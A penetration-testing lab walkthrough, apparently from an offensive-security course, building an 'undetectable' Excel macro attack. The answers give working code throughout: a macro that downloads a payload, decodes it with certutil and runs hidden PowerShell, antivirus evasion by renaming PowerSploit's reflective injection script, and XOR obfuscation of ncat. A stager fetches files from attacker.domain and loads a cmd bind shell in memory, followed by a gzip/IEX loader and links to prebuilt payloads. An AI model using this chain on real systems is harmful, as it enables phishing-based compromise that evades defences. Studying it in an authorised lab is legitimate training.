# Lab 1: Custom Undetectable Macro Development

- [Lab 1: Custom Undetectable Macro Development](#lab-1-custom-undetectable-macro-development)
  - [Scenario](#scenario)
  - [Goals](#goals)
  - [What you will learn](#what-you-will-learn)
  - [Tools](#tools)
  - [Task 1: Develop a custom macro and the accompanying](#task-1-develop-a-custom-macro-and-the-accompanying)
    - [Answer](#answer)
  - [Task 2: Evade any A/V or IDS in place](#task-2-evade-any-av-or-ids-in-place)
  - [Task 2.1: Develop A/V-resistant payloads](#task-21-develop-av-resistant-payloads)
    - [Answer](#answer-1)
  - [Task 2.2: Develop IDS-resistant payloads](#task-22-develop-ids-resistant-payloads)
    - [Answer](#answer-2)
  - [Task 3: Execute the attack](#task-3-execute-the-attack)
    - [Answer](#answer-3)
- [Reference:](#reference)

---

## Scenario

In the following lab, you can practice the attack vector development techniques explained in the Penetration Testing eXtreme course.

Your goal is to develop a **custom macro-based attack** (and the accompanying payloads), to compromise a target without being detected. The compromise should occur through **reflectively injecting a PE file in the target's memory**.

In this lab's context we are going to reflectively inject `ncat` and compromise the target via a bind shell. Of course, you can use any PE file, such as a custom RAT.

Imagine that you are delivering an internal penetration test on a network featuring A/V, Host IDS and Network IDS.

Scope of Engagement: NETBLOCK: `10.100.13.0/24`

---

## Goals

- Develop a custom macro-based attack and the accompanying payloads
- Evade any A/V or IDS in place
- Reflectively inject a PE file in the target's memory

---

## What you will learn

During the lab, you will 

- learn how various techniques can be combined to compromise a target during an internal social engineering campaign, starting with a macro;
- learn how to evade modern defenses (A/V, HIDS, NIDS etc.), by writing custom code and obfuscating your payloads.

To guide you during the lab you will find different tasks. Tasks are meant for educational purposes and to show you the usage of different tools and different methods to achieve the same goal. They are not meant to be used as a methodology.

Armed with the skills acquired though the task you can achieve the lab goal.

If this is the first time doing this lab, we advise you to follow these tasks. Once you have completed all the tasks, you can proceed to the end of this paper and check the solutions

---

## Tools

- Microsoft Office
- [Powersploit's Invoke-ReflectivePEInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1)

---

## Task 1: Develop a custom macro and the accompanying

The first step of this lab is to create a custom macro and the accompanying **PE-injection related payloads**. This means that you should avoid using automated tools, and that uncommon/obscure techniques should be employed.

To do this, you can use any of the techniques described in the Penetration Testing eXtreme course - Advanced Social Engineering module. The **certutil-based dropper** we covered in the course is a practical technique for this lab's context.

As far as the PE-injection related payloads are concerned, there are several ways and frameworks to develop them. Powersploit's [Invoke-ReflectivePEInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) is a viable technique for this lab's context. [Invoke-ReflectivePEInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) can reflectively load a DLL/EXE into the PowerShell process, or it can reflectively load a DLL into a remote process.

<br/>

### Answer

Before beginning, let mimick a web server locally with the following [PowerShell script](https://gist.github.com/AyrA/e04c977232a74525f4421cd4cb1a4764):

??? note "Simple PowerShell Webserver"

    ```powershell
    # Portable HTTP file server
    # Should be somewhat safe but please don't actually use it.
    # You can't exit this with CTRL+C directly and need to use the shutdown command below a directory listing,
    # or you can kill the powershell process of course, but this causes the port to stay used sometimes.

    # Features
    # - Directory Browser
    # - Can handle UTF8 URLs
    # - Delivers unknown file types
    # - /../ attack prevention

    # Drawbacks
    # - Only one request at a time
    # - Only runs on localhost unless it has administrative rights
    # - Files loaded completely into memory

    Add-Type -AssemblyName System.Web

    # Writes a string to a stream that expects a byte array
    function Write-String {
        $b=[System.Text.Encoding]::UTF8.GetBytes($args[1])
        $args[0].Write($b,0,$b.Length)
    }

    # HTML Encoder
    function Html-Encode {
        return [System.Web.HttpUtility]::HtmlEncode($args[0])
    }

    # URL Encoder
    function Url-Encode {
        return [uri]::EscapeDataString($args[0])
    }

    # Prevent accidental exit
    $nonce = [System.DateTime]::Now.Ticks

    # Cheap Directory Jail
    New-PSDrive -Name OhGodWhy -PSProvider FileSystem -Root $PWD.Path

    # Create and start listener
    $listener = New-Object System.Net.HttpListener
    $listener.Prefixes.Add("http://localhost:55555/")
    $listener.Start()

    echo "Http: http://localhost:55555/"
    echo "Path: $PWD"

    # Open default browser
    start "http://localhost:55555/"

    # Be able to serve multiple requests
    while($listener.IsListening){
        $Context = $listener.GetContext()
        $URL = $Context.Request.Url.LocalPath
        echo "Request: $URL"
        if(Test-Path "OhGodWhy:$URL" -PathType Leaf){
            echo "Requesting a File"
            # Is file, serve it
            $Content = Get-Content -Encoding Byte -Path "OhGodWhy:$URL" -ReadCount 0

            # This can throw an error on older versions of PowerShell but the web server will still work
            $Context.Response.ContentType = [System.Web.MimeMapping]::GetMimeMapping($URL)
            $Context.Response.ContentLength = $Content.Length

            # Write content as-is
            $Context.Response.OutputStream.Write($Content, 0, $Content.Length)
        } elseif (Test-Path "OhGodWhy:$URL" -PathType Container) {
            if($Context.Request.Url.Query -eq "?$nonce"){
                echo "Requesting Server Shutdown"
                # Stop listener
                $Context.Response.ContentType = "text/html"
                Write-String $Context.Response.OutputStream "<h1>The server has been shut down</h1>"
                $Context.Response.Close()
                # Give the component time to deliver the answer
                sleep 1
                $listener.Stop()
                return
            }else{
                echo "Requesting Directory listing"
                # Is directory, show contents
                $Context.Response.ContentType = "text/html; charset=utf-8"
                $Context.Response.ContentEncoding = [System.Text.Encoding]::UTF8

                # Make it look somewhat nice
                Write-String $Context.Response.OutputStream "<style>
    *{font-family:monospace;font-size:14pt}
    div a{text-decoration:none;display:inline-block;width:49%;padding:5px}
    div a:hover{background-color:#FF0}
    #sd{color:#F00;text-decoration:none;}</style>"
                Write-String $Context.Response.OutputStream "<h1>Directory Listing</h1><div>"

                # UP
                Write-String $Context.Response.OutputStream "<a href=""../"">&lt;UP&gt;</a><br />"

                # Directories above files
                Get-ChildItem "OhGodWhy:$URL" | Where-Object { $_.PSIsContainer } | Foreach-Object {
                    $fn=[System.IO.Path]::GetFileName($_.FullName)
                    $href=Url-Encode $fn
                    $fn=Html-Encode $fn
                    Write-String $Context.Response.OutputStream "<a href=""$href/"">$fn/</a>"
                }
                Get-ChildItem "OhGodWhy:$URL" | Where-Object { -not $_.PSIsContainer } | Foreach-Object {
                    $fn=[System.IO.Path]::GetFileName($_.FullName)
                    $href=Url-Encode $fn
                    $fn=Html-Encode $fn
                    Write-String $Context.Response.OutputStream "<a href=""$href"">$fn</a>"
                }

                # Shutdown
                Write-String $Context.Response.OutputStream "</div><hr/>[<a id=""sd"" href=""/?$nonce"">SHUTDOWN</a>]<hr/>"
            }
        } else {
            echo "HTTP 404"
            # Not found
            $Context.Response.StatusCode = 404;
            $Context.Response.ContentType = "text/plain";
            Write-String $Context.Response.OutputStream "$URL not found"
        }
        echo "Done"
        # Complete request
        $Context.Response.Close()
    }

    ```

Use **powershell** to run the above script:

??? note "Command"

    ```powershell
    powershell -ep bypass
    .\psweb.ps1
    ```

First create a new Excel document.

To add macro, navigate to `View > Macros > View Macros`:
[![picture 1](images/4c56128158209bac2c68f293f90386393ffffe69346dae25df0491528727ef2b.png)](images/4c56128158209bac2c68f293f90386393ffffe69346dae25df0491528727ef2b.png)

Name it `ExcelDefault` and click `Create`:

[![picture 2](images/660f0847a27a5d7e5e317c73c72a35d9745146fd054d7476e993751ed92584b6.png)](images/660f0847a27a5d7e5e317c73c72a35d9745146fd054d7476e993751ed92584b6.png)

Use the following macro.

??? note "macro"
    ```
    Sub ExcelDefault()
        Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
        Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
        xHttp.Open "GET", "http://localhost:55555/ps1_b64.crt", False
        xHttp.Send

        With bStrm
            .Type = 1 '//binary
            .Open
            .write xHttp.responseBody
            .savetofile "encoded_ps1.crt", 2 '//overwrite
        End With

        Shell ("cmd /c certutil -decode encoded_ps1.crt decoded.ps1 & c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass -W Hidden .\decoded.ps1")
    End Sub
    ```

Note that the crt file is created using PowerShell Empire. For example:

??? note "Powershell Empire Commands"

    ```
    setup listener
    usestager hta <LISTENER_NAME>
    execute
    ```

    The output will be a base64 encoded string - saved as a `.crt` file

For reflectively injecting a PE file, as we already mentioned, we will use **Powersploit's** `Invoke-ReflectivePEInjection`. `ps1_b64.crt` will contain both an A/V resistant `Invoke-ReflectivePEInjection` variant and custom-made **XOR de-obfuscation** for IDS resistance (stage payload de-obfuscation).

---

## Task 2: Evade any A/V or IDS in place

An important skill to have, as a penetration tester / red team member, is the ability to craft A/V and IDS resistant payloads. In the second step of this lab you will exercise that skill.

<br/>

## Task 2.1: Develop A/V-resistant payloads

The certutil-based dropper seems in good shape, as far as its A/V detection rate is concerned. Although, since practice makes perfect, you can further enhance its A/V resistance if you want.

[Invoke-ReflectivePEInjection] on the other hand seems to get caught by many A/V vendors. Do not worry though. Multiple A/Vs can be bypassed by simply removing all comments and renaming/obfuscating functions. Give this a try...

Finally, on the "Develop IDS-resistant payloads" sub-task below we will develop and utilize custom XOR obfuscation/de-obfuscation for the attack's stage payload. Since custom code is employed, the payload will be quite A/V resistant.

<br/>

### Answer

To make Powersploit's `Invoke-ReflectivePEInjection` more A/V-resistant, simply remove every comment and rename the first function to `Invoke-PEInjectionInMemory`. See [Invoke-PEInjectionInMemory](../scripts/Invoke-PEInjectionInMemory.ps1)

`Invoke-ReflectivePEInjection` can be used to reflectively inject a PE file into memory. We can use this technique to inject Metasploit's or PowerShell Empire's payloads or a custom-made RAT. For this lab's context, we are going to inject our favorite [Ncat](https://nmap.org/dist/ncat-portable-5.59BETA1.zip).

<br/>

## Task 2.2: Develop IDS-resistant payloads

Develop A/V-Resistant Payloads focuses on how to make the attack's stager evade defenses. In order to make your payload IDS-resistant, you will have to **encode** or **obfuscate** the attack's stage payload.

One of the easiest ways to do this would be by **XORing** all stage payloads. This means that the stage payload, requested by the stager, will enter the network being XOR-obfuscated. Then, using a custom and PowerShell based XOR function, you can decrypt them and execute them.

### Answer

For making the attack's stage payload (the PE file to be injected in memory - Ncat) IDS-resistant we will perform the following obfuscation steps.

First, convert `ncat.exe` to a Base64 string. 

Open Windows PowerShell ISE, paste the following PowerShell script and execute it.

??? note "Convert.ps1"

    ```powershell
    function Convert-BinaryToString {
        [CmdletBinding()] param (
            [string] $FilePath
        )
        try {
        $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
        }
        catch {
            throw "Failed to read file.";
        }
        if ($ByteArray) {
            $Base64String = [System.Convert]::ToBase64String($ByteArray);
        }
        else {
            throw '$ByteArray is $null.';
        }
        Write-Output -InputObject $Base64String;
    }
    Convert-BinaryToString path_to_ncat_executable
    ```

Then, create the key with which you will XOR-obfuscate the Base64-converted `ncat.exe` in step 1. Create a random Base64 string of equal length to the Base64-converted ncat.exe. A quick way to do this would be taking the Base64-converted ncat.exe and replacing, for example, all `A`s with `M`s.

XOR the Base64-converted `ncat.exe` with the key  created in Step 2. Use the following PowerShell script:

??? note "XOR script"

    ```powershell
    param (
        [Parameter(Mandatory=$true)]
        [string] $file1, #First File
        [Parameter(Mandatory=$true)]
        [string] $file2, #Second file
        [Parameter(Mandatory=$true)]
        [string] $out #Output File
    ) #end param
    $file1_b = [System.IO.File]::ReadAllBytes("$file1")
    $file2_b = [System.IO.File]::ReadAllBytes("$file2")
    $len = if ($file1_b.Count -lt $file2_b.Count) {$file1_b.Count} else { $file2_b.Count}
    $xord_byte_array = New-Object Byte[] $len
    # XOR between the files
    for($i=0; $i -lt $len ; $i++) {
        $xord_byte_array[$i] = $file1_b[$i] -bxor $file2_b[$i] }
    [System.IO.File]::WriteAllBytes("$out", $xord_byte_array)
    write-host "[*] $file1 XOR $file2`n[*] Saved to " -nonewline;
    Write-host "$out" -foregroundcolor yellow -nonewline; Write-host ".";   
    ```

Save the above PowerShell script locally (e.g. `xor_files.ps1`), start a PowerShell session and execute the following. The result will be an XOR-obfuscated Ncat (in Base64 form).

??? note "xor_files.ps1"

    ```powershell
    powershell -ep bypass .\xor_files.ps1 .\Base64-converted_ncat .\XOR_key
    ```

Then use [Powersploit's Invoke-ReflectivePEInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) add the following to the end (replacing http://attacker.domain/xored_ncat and http://attacker.domain/xor_key so that they point to your server) and compress it using [gzip](http://www.txtwizard.net/compression).

??? note "code"

    ```powershell
    #Drop the XORed Ncat from step 3 and the XOR key from Step 2 to Temp
    (new-object Net.WebClient).DownloadFile('http://attacker.domain/xored_ncat' , $env:temp+"/ciphertext")
    (new-object Net.WebClient).DownloadFile('http://attacker.domain/xor_key' , $env:temp+"/key")
    $ciphertext = [System.IO.File]::ReadAllBytes($env:temp+"/ciphertext")
    $key = [System.IO.File]::ReadAllBytes($env:temp+"/key")
    $len = if ($ciphertext.Count -lt $key.Count) {$ciphertext.Count} else { $key.Count}
    $xord_byte_array = New-Object Byte[] $len

    #XOR between the XORed Ncat and the XOR key
    for($i=0; $i -lt $len ; $i++) {
        $xord_byte_array[$i] = $ciphertext[$i] -bxor $key[$i] }

    #The deciphered Ncat is stored on Temp
    [System.IO.File]::WriteAllBytes($env:temp+"/deciphered", $xord_byte_array)
    $deciphered = Get-Content $env:temp/deciphered
    $PEBytes = [System.Convert]::FromBase64String($deciphered)

    #De-obfuscated Ncat is reflectively loaded into memory
    Invoke-PEInjectionInMemory -PEBytes $PEBytes -ExeArgs "-nlvp 4444 -e cmd"

    ```

Finally embed the gzip compressed altered `Invoke-ReflectivePEInjection` in the above and save as a PS1 file:

??? note "Command"

    ```
    $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('insert_gzip_compressed_Invoke-ReflectivePEInjection'));
    IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
    ```

---

## Task 3: Execute the attack

Now you fulfill all the prerequisites to inject a PE file in the target's memory starting from a macro and remaining undetected.

<br/>

### Answer

To sum up, to execute the attack, perform the following.

1. Base64-encode the PS1 file we created in Step 5 of Task 2.2 and save it as a CRT file. Host this file on a server you control. Also host the XOR-obfuscated Ncat (Step 3 of Task 2.2) and the key (Step 2 of Task 2.2), so that they can be accessed by the stager.

2. Inside the macro we developed in Task 1, replace https://attacker.domain/ps1_b64.crt with the location of the CRT file above.

3. Send the Office document containing the macro to your target. For this lab's context, you can RDP into the target machine ("rdesktop 10.100.13.5", credentials: ELS_Admin/P@ssw0rd123), transfer your malicious Office document and execute it, just like the target would do.

4. In a matter of minutes, you will should be able to communicate with the target through a bind shell on port 4444 (or the port you specified on Step 4 of Task 2.2), as follows.


```
nc 192.168.60.5 4444
```

---

# Reference:

- [Book1.xls](https://mega.nz/file/cE1h1JbI#szFIlo6dmEp_0L7IIRKAkOdh4_484ulLf3bLI98phMk)
- [ps1_b64.crt](https://mega.nz/file/oMthCJ4I#H7eP8C9-HbkJOgJGjwdmWEFzU4a06AfqbRd2eoUWrgE)
- [xored](https://mega.nz/file/FV0VwbbB#1ctSRHxYqlTdm0LAG3_192OwAsUekwCeUZ9B1klmBvg)
- [key](https://mega.nz/file/cY0nlZbQ#zipB9xtpI_IIHmmwceZPQzT6RuCkfKnW2q2MazOAr74)